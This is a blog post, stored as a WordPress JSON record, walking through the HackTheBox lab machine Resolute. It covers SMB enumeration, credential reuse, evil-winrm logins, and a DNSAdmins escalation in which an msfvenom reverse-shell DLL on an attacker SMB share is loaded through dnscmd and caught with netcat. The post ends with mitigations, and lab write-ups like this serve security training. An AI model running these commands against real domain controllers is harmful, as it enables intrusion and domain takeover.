{"id":249,"date":"2020-05-31T18:10:37","date_gmt":"2020-05-31T18:10:37","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=249"},"modified":"2020-05-31T18:10:38","modified_gmt":"2020-05-31T18:10:38","slug":"hackthebox-resolute-walkthrough","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/hackthebox-resolute-walkthrough\/","title":{"rendered":"Hackthebox: Resolute Walkthrough"},"content":{"rendered":"\n<p>Hey fellow hackers!<br>\nThe post will be guiding you on how to own resolute from Hackthebox.<\/p>\n\n\n\n<p>Resolute is an easy rated machine. The box has a very straightforward initial foothold. But owning the administrator is a bit tricky.<br>\nIt depicts another instance of an AD group membership privilege escalation.<\/p>\n\n\n\n<p>So let\u2019s get started!!<\/p>\n\n\n\n<p>Run the nmap scan to retrieve all the open ports, services running.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># nmap -sC -sV -oA resolute.namp 10.10.10.169<\/pre>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/_8DZa56VpRRV1fyPgjmOdmNfecin5qnwbnbOef3yR7sTL911LIg-nhnS3MDnEVkauaZy5dA9X128Tolr-VdfckLAFk5rvgRO-5phDo7rL_MPVypQpbnvjIXpKO7-pYMmC0ElmiJK\" alt=\"\" width=\"797\" height=\"349\"\/><\/figure>\n\n\n\n<p>The nmap results show various open <strong>smb, ldap<\/strong>. A useful service for us can be smb. So let\u2019s do some basic enumeration.<\/p>\n\n\n\n<p>Since there were no public shares available, i ran <strong>enum4linux to <\/strong>enumerate users. And voila!!, found a lot of users. In enumeration, I saw that the user<strong> marko<\/strong> is written his password in the description. An easy win!!<\/p>\n\n\n\n<p>I tried <a href=\"https:\/\/github.com\/Hackplayers\/evil-winrm\">evil-winrm<\/a> on the creds obtained, but it didn\u2019t seem to work. So I made a list of all the users and passed it through <b>crackmapexec<\/b> and guess what.. User <b>melanie<\/b> had the same password as marko!<\/p>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/NIQ63YiJsKfwBGLGcXRCs1fjSwx-mrSz71EaaVakX3OCUWRoMUNNz2TFoE6hUcsNMjbb_irLVs_dg9QkYUd1qjU3EHPpUMfWvkRxC1KtO4XHqiOcqjFJmszPhFayecn5BcRSk02b\" alt=\"\" width=\"877\" height=\"318\"\/><\/figure>\n\n\n\n<p>Again i tried, <strong>evil-winrm<\/strong> on the creds of melanie and yes I got the user shell and the <strong>user.txt<\/strong> by running the command<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># evil-winrm -i 10.10.10.169 -u melanie -p Welcome123!<br>\n# cd C:\\Users\\melanie\\Desktop<br>\n# type user.txt<\/pre>\n\n\n\n<p>Along with user melanie, ryan was also present on the box, but didnt had its access. So lets find out its creds.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Finding the creds for ryan<\/h2>\n\n\n\n<p>After getting the user flag, I jumped over to C:\\\u00a0 to enumerate further. Ran a dir but found nothing interesting.\u00a0<\/p>\n\n\n\n<p>Then i added -force switch to grab hidden files too.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">> dir -force<\/pre>\n\n\n\n<p>And the command revealed a lot of hidden files<img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/VaHwjVcwS6JVD_EJrj7UjDEqNGDqnEVvBRz0ZlHZWg4-xUNO7F16scAfoHoUQiQ2sQWzKX42FGtjbWTnzATO6y9t12zXTVLFyTa5aFRMoCYbSEHVRygIgJWKOgIbIAitUyBZph1z\" width=\"624\" height=\"360\"><\/p>\n\n\n\n<p>I looked into each file. The content of the file <strong>PStranscripts<\/strong> revealed interesting information : creds of another user ryan!!<\/p>\n\n\n\n<p>Note : From <a href=\"https:\/\/docs.microsoft.com\/en-us\/powershell\/module\/microsoft.powershell.host\/start-transcript?view=powershell-7\">Ms Docs<\/a>, transcripts records all or part of powershell session into a text file. The transcript containes everything that user types along with the output of the console.<\/p>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/fFbIBf6bBfeB9XUFBuTDopx0wvAk4mHTqs-Ot2Z_DwnGMlIq_DRwJk_0-cLJzrQ0e5_AQJHG1-8YIW_ekTPh-fstN7x7EsYAHcfQrK5Ak_GAZvc4yPhwCez0L7bQu9QRA2pka3kB\" alt=\"\" width=\"721\" height=\"325\"\/><\/figure>\n\n\n\n<p>So i opened up another evil-winrm session with the creds of ryan and ran whoami \/all .\u00a0<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># evil-winrm -i 10.10.10.169 -u ryan -p Serv3r4Admin4cc123!\n\n> whoami \/all<\/pre>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>\/all<\/td><td>Displays all information in the current access token, including the current user name, security identifiers (SID), privileges, and groups that the current user belongs to.<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/p8zgtslkPzdwJADOZxhlJtnReba9klXY6EneSn6csfusdphKEcx8lB6oWzs6snDh1wMayPJMEkAS6hUbvGmG4C5FAo1VXhjHFwmsBvqM10CntJkQTkRfFubTWIvhqD3g4bX5gABk\" alt=\"\" width=\"1001\" height=\"401\"\/><\/figure>\n\n\n\n<p>The output shows that ryan is a member of <strong>DNSAdmins<\/strong> and we can perform a privilege escalation on DNSAdmin to become Doman Admins.<\/p>\n\n\n\n<p>This attack relies on the malicious dll injection into the dns service that runs as SYSTEM on the dns server. The dll contains the reverse tcp code.<\/p>\n\n\n\n<p>According to Microsoft protocol specification, performing \u201c<strong>ServerLevelPluginDll<\/strong>\u201d operation enables us to load a dll of our choice (without path verification of dll).<br>\nWhen user as dnsadmin executes dnscmd.exe (utility to manage dns servers)  following registry key gets populated<br>\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\DNS\\Parameters\\ServerLevelPluginDll <\/p>\n\n\n\n<p style=\"background-color:#f8f1ef\" class=\"has-background\"><strong><a href=\"https:\/\/docs.microsoft.com\/en-us\/openspecs\/windows_protocols\/ms-dnsp\/c9d38538-8827-44e6-aa5e-022a016ed723\">ServerLevelPluginDll:&nbsp;<\/a><\/strong>An absolute pathname of a dynamic link library that the DNS server can use to resolve unknown names, or an empty string to remove or disable the previously selected DLL. This protocol only treats the pathname as a string, it does not constrain the syntax in any way.<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li>So as  a very first step, a payload has to be created on which we can get the reverse shell.<\/li><\/ol>\n\n\n\n<p>The payload(dll) can be created using msfvenom as :<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># msfvenom -p windows\/x64\/shell_reverse_tcp LHOST=10.10.14.160 LPORT=4444 --platform=windows -f dll &gt; plugin.dll<\/pre>\n\n\n\n<p>(Change the LHOST to the ip of your attacking machine)<\/p>\n\n\n\n<p>2.  Now we have a setup a smbserver so that the payload(plugin.dll) can be uploaded to the victim.<\/p>\n\n\n\n<p>There is a script <a href=\"https:\/\/github.com\/SecureAuthCorp\/impacket\/blob\/master\/examples\/smbserver.py\">smbserver.py<\/a> by impacket that can be used for the same.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">#smbserver.py SHARE \/root\/Desktop\/htb\/resolute<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/3A__EW4YeIin6c7F8oF6WTXX3vT60iW8e3Zm_z--9xH68692lRtintOtH_3KEQ-6NzWx2a3bowsp-73Wu28pjZtugcDZ_iFbQ2Etuvj2bTMfx1quW1TPm0fk9vNYc8tAQg3vEnI1\" alt=\"\"\/><\/figure>\n\n\n\n<p><strong>SHARE<\/strong> : name of the share<br><strong>\/root\/Desktop\/htb\/resolute<\/strong> : Path of the files you want to share with smb <\/p>\n\n\n\n<p>To check if the victim is able to access the SHARE, run<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">net view \\\\10.10.14.160(your_smb_server_ip)<\/pre>\n\n\n\n<p>As we have our payload uploaded, the following command can be run on the victim, that injects our payload in the dnsserver.<\/p>\n\n\n\n<p>Also the dns service has to be stopped and start again so that the <strong>plugin.dll<\/strong> (payload) is loaded.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># dnscmd.exe \/config \/serverlevelplugindll \\\\10.10.14.160\\SHARE\\plugin.dll<br># sc.exe stop dns<\/pre>\n\n\n\n<p>Open up a netcat listener on the host machine<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># nc -lnvp 4444<\/pre>\n\n\n\n<p>And then run the following command on the target machine<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># sc.exe start dns<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/hTTVzGLn3Mi2znOXNWMbTRWTerJ_DuH1HaksVAl-WIcd_xnld8SrXfiTjP6lW9bzqvfXxPGmJhoZb-zmIzNEbdEzhQWoLiAz5qytWJ_kF24nLL-G9hUIDMWg7VQYyPL6E2pxPrbh\" alt=\"\"\/><\/figure>\n\n\n\n<p>As the malicious dll gets loaded into the dns server, we get a shell<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/ioLx7hVQMB7Ilb7jOjc8C7G7Jx_aeWhhhKsAfQ0dWYhmj4nqGKdxEYcftw6FOEvhmLiruYeKsCEpq_BGHkorpSZPQdJPuNgtWqnW6lC9ZxJG-FXFpgHQe9mD1GXLoSLR6I_t6HBT\" alt=\"\"\/><\/figure>\n\n\n\n<p>And we are <strong>Admininstrator!!<\/strong><\/p>\n\n\n\n<p>Root.txt can be found in <strong>C:\\Users\\Administrator\\Desktop\\root.txt<\/strong><\/p>\n\n\n\n<p>Looking for mitigations for the above vulnerable scenerios ??<br> Here is what you should do!!<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>The AD user passwords <strong>should not<\/strong> be stored in the description, when the user is created.<\/li><li>The file <strong>PSTranscripts<\/strong> where we found the creds of ryan should be readable only by the administrators<\/li><li>To prevent privilege escalation from DNS Admin to Domain Admin, only <strong>administrator <\/strong>should be a <strong>member<\/strong> of DNSAdmins.<\/li><li>Only privileged computers\/groups should be able to access the Domain Controller over RPC.<\/li><li>Regularly review the DNS server object permissions for any group\/account that shouldn\u2019t have privileged access.<\/li><\/ul>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hey fellow hackers! The post will be guiding you on how to own resolute from Hackthebox. Resolute is an easy rated machine. The box has a very straightforward initial foothold. But owning the administrator is a bit tricky. It depicts another instance of an AD group membership privilege escalation. So let\u2019s get started!! Run the [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":259,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[19,2,109],"tags":[117,118,102,26,54,120,108,100,101,52,116,114,113,119,57],"class_list":["post-249","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackthebox","category-information-security","category-windows","tag-dnsadmin","tag-domain-admin","tag-hacking","tag-hackthebox","tag-htb","tag-impacket","tag-information-security","tag-infosec","tag-pentest","tag-red-teaming","tag-resolute","tag-samba-share","tag-smb","tag-smbserver","tag-windows","entry","has-media"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/249"}],"collection":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/comments?post=249"}],"version-history":[{"count":10,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/249\/revisions"}],"predecessor-version":[{"id":262,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/249\/revisions\/262"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media\/259"}],"wp:attachment":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media?parent=249"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/categories?post=249"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/tags?post=249"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}